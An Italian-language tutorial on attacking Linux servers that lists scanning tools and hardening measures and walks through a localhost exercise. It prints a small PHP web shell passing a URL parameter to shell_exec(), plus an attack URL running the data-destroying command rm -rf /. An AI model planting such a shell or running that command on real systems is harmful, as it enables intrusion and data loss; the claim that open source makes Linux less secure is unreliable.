Hacking del sistema operativo Linux: Hacking con Ubuntu (Commands Tutorial)

Linux è il sistema operativo per server più usato, specialmente per i server web. È open source; questo significa che chiunque può avere accesso al codice sorgente. Questo lo rende meno sicuro rispetto ad altri sistemi operativi in quanto gli attaccanti possono studiare il codice sorgente per trovare vulnerabilità. Linux per gli hacker riguarda lo sfruttamento di queste vulnerabilità per ottenere un accesso non autorizzato ad un sistema.

In questo articolo, vi presenteremo cos’è Linux, le sue vulnerabilità di sicurezza, l’hacking con Ubuntu e le contromisure che potete mettere in atto.

Argomenti trattati in questo tutorial

  • Nota rapida su Linux
  • Strumenti di hacking Linux
  • Come prevenire gli hacking Linux
  • Attività di hacking: Hackerare un sistema Linux usando PHP

Nota rapida su Linux

Linux è un sistema operativo open source. Ci sono molte distribuzioni di sistemi operativi basati su Linux come Redhat, Fedora, e Ubuntu, ecc. A differenza di altri sistemi operativi, Linux è meno sicuro quando si tratta di sicurezza. Questo perché il codice sorgente è disponibile liberamente, quindi è facile studiarlo per le vulnerabilità e sfruttarle rispetto ad altri sistemi operativi che non sono open source. Linux può essere usato come sistema operativo per server, desktop, tablet o dispositivi mobili.

I programmi Linux possono essere utilizzati utilizzando sia la GUI che i comandi. I comandi Linux per l’hacking di Kali Linux sono più efficaci ed efficienti rispetto all’uso della GUI. Per questo motivo, è utile conoscere i comandi di base di Linux per l’hacking.

Fate riferimento a questi tutorial https://www.guru99.com/unix-linux-tutorial.html su come iniziare con gli hack di Kali Linux.

Strumenti di hacking Linux

  • Nessus- questo strumento può essere utilizzato per l’hack di Ubuntu, scansionare le impostazioni di configurazione, le patch e le reti ecc. può essere trovato a https://www.tenable.com/products/nessus
  • NMap. Questo strumento può essere utilizzato per monitorare gli host che sono in esecuzione sul server e i servizi che stanno utilizzando. Può anche essere usato per la scansione delle porte. Può essere trovato a https://nmap.org/
  • SARA – SARA è l’acronimo di Security Auditor’s Research Assistant. Come suggerisce il nome, questo strumento può essere utilizzato per verificare le reti contro minacce come SQL Injection, XSS ecc. Può essere trovato a http://www-arc.com/sara/sara.html

L’elenco di cui sopra non è esaustivo; ti dà un’idea degli strumenti disponibili per l’hacking di Ubuntu e dei sistemi Linux.

Come prevenire gli hacking Linux

L’hacking Linux sfrutta le vulnerabilità del sistema operativo. Un’organizzazione può adottare la seguente politica per proteggersi da tali attacchi.

  • Gestione delle patch – le patch correggono i bug che gli attaccanti sfruttano per compromettere un sistema. Una buona politica di gestione delle patch assicurerà l’applicazione costante di patch pertinenti al sistema.
  • Corretta configurazione del sistema operativo- altri exploit sfruttano le debolezze nella configurazione del server. I nomi utente e i demoni inattivi dovrebbero essere disabilitati. Le impostazioni predefinite come le password comuni alle applicazioni, i nomi utente predefiniti e alcuni numeri di porta dovrebbero essere cambiati.
  • Intrusion Detection System- tali strumenti possono essere utilizzati per rilevare l’accesso non autorizzato al sistema. Alcuni strumenti hanno la capacità di rilevare e prevenire tali attacchi.

Attività di hacking: Hack di un sistema Linux Ubuntu usando PHP

In questo scenario pratico, impareremo come hackerare con Ubuntu e vi forniremo informazioni di base su come è possibile utilizzare PHP per compromettere un Linux. Non prenderemo di mira nessuna vittima. Se volete provare, potete installare LAMPP sulla vostra macchina locale.

PHP è dotato di due funzioni che possono essere utilizzate per eseguire comandi di hacking su Linux. Ha le funzioni exec() e shell_exec(). La funzione exec() restituisce l’ultima riga dell’output del comando mentre shell_exec() restituisce l’intero risultato del comando come una stringa.

A scopo dimostrativo, supponiamo che l’attaccante gestisca l’upload del seguente file su un server web.

<?php$cmd = isset($_GET) ? $_GET : 'ls -l';echo "executing shell command:-> $cmd</br>";$output = shell_exec($cmd);echo "<pre>$output</pre>";?>

QUI,

Lo script precedente ottiene il comando dalla variabile GET chiamata cmd. Il comando viene eseguito usando shell_exec() e i risultati vengono restituiti nel browser.

Il codice di cui sopra può essere sfruttato utilizzando il seguente URL

http://localhost/cp/konsole.php?cmd=ls%20-l

QUI,

  • “…konsole.php?cmd=ls%20-l “assegna il valore ls -l alla variabile cmd.

Il comando in Ubuntu per l’hacking contro il server sarà eseguito come

shell_exec('ls -l') ;

L’esecuzione del codice di cui sopra su un server web dà risultati simili ai seguenti.

Il comando precedente mostra semplicemente i file nella directory corrente e i permessi

Supponiamo che l’attaccante passi il seguente comando

rm -rf /

QUI,

  • “rm” rimuove i file
  • “rf” fa eseguire il comando rm in modo ricorsivo. Eliminando tutte le cartelle e i file
  • “/” indica al comando di iniziare a cancellare i file dalla directory principale

L’URL dell’attacco sarebbe qualcosa di simile a questo

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Sommario

  • Linux è un sistema operativo popolare per server, desktop, tablet e dispositivi mobili.
  • Linux è open source, e il codice sorgente può essere ottenuto da chiunque. Questo rende facile individuare le vulnerabilità. È uno dei migliori sistemi operativi per gli hacker.
  • I comandi di hacking di base e di rete in Ubuntu sono preziosi per gli hacker Linux.
  • Le vulnerabilità sono una debolezza che può essere sfruttata per compromettere un sistema.
  • Una buona sicurezza può aiutare a proteggere un sistema dall’essere compromesso da un attaccante.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato.